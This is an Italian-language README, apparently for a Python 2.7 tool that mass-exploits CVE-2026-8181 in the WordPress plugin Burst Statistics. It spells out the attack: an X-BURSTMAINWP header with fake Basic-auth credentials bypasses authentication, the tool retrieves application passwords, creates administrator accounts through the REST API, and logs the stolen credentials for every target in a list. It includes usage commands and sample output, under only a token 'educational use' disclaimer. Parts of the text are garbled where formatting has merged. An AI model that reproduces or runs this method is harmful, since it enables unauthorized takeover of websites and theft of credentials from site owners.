
CVE-2026-8181: Bypass dell'autenticazione di Burst Statistics → compromissione dell'API REST e creazione di un admin. Python 2.7. Solo per uso educativo.
Python 2.7 exploit per la vulnerabilità del plugin Burst Statistics (CVE-2026-8181) che consente ad attaccanti non autenticati di bypassare l'autenticazione REST API, recuperare le password delle applicazioni e creare nuovi utenti amministratori su siti WordPress vulnerabili.
⚠️ Disclaimer
Questo strumento è solo per scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Usalo solo su siti web di tua proprietà o per cui hai esplicito permesso di testare. Puoi vedere ulteriori disclaimer sulla copertina di Jenderal92. Puoi verificarlo QUI !!!
CVE-2026-8181 colpisce il plugin Burst Statistics per WordPress (versioni precedenti alla patch). Il difetto risiede nel meccanismo di autenticazione REST API e consente a un attaccante di:
X-BURSTMAINWP appositamente costruito/burst/v1/mainwp-auth/, /wordpress, /wp)/wp-json/wp/v2/users o redirect dell'ID autoreres_login.txt – Credenziali REST API concise, separate da pipe (facili da analizzare/importare)full_res_login.txt – Report completo e leggibile che include verifica dell'accesso e password delle applicazionirequestspip install requests
Preparare un file con l'elenco dei target (un dominio o IP per riga, con o senza http:///https://).
Esempio targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
Eseguire l'exploit:
python2 CVE-2026-8181.py targets.txt
res_login.txt – Credenziali REST API (una riga per target vulnerabile)full_res_login.txt – Report dettagliato| Argomento | Descrizione |
|---|---|
list.txt | Percorso del file contenente gli URL dei target |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – Credenziali REST API conciseOgni riga segue questo formato separato da pipe:
target|username|password|email|user_id
Esempio:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
Questo formato è ideale per:
cut, grep o Excelfull_res_login.txt – Report dettagliato completoPer ogni target vulnerabile, lo script aggiunge un blocco leggibile:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
Nota: Se l'endpoint della password dell'applicazione non è disponibile o non restituisce alcun token, quella sezione mostrerà
FAILED.
http:// se mancante, rimuove gli slash finali./, /wordpress e /wp come directory base di WordPress./wp-json/wp/v2/users o utilizza i redirect ?author=N.X-BURSTMAINWP: 1 + Basic auth con username e password fittizia (CVE-2026-8181). Se l'endpoint /wp-json/wp/v2/users/me?context=edit restituisce 200, il sito è vulnerabile./wp-json/burst/v1/mainwp-auth per recuperare un token per la password dell'applicazione./settings, /plugins, /users.POST /wp-json/wp/v2/users.res_login.txt e i dettagli completi in full_res_login.txt.Puoi modificare queste variabili all'interno dello script:
THREADS – Numero di thread concorrenti (default 10)BASE_PATHS – Ulteriori sottodirectory di WordPress da controllarerequestsQuesto progetto è fornito solo a scopo educativo. Usalo a tuo rischio.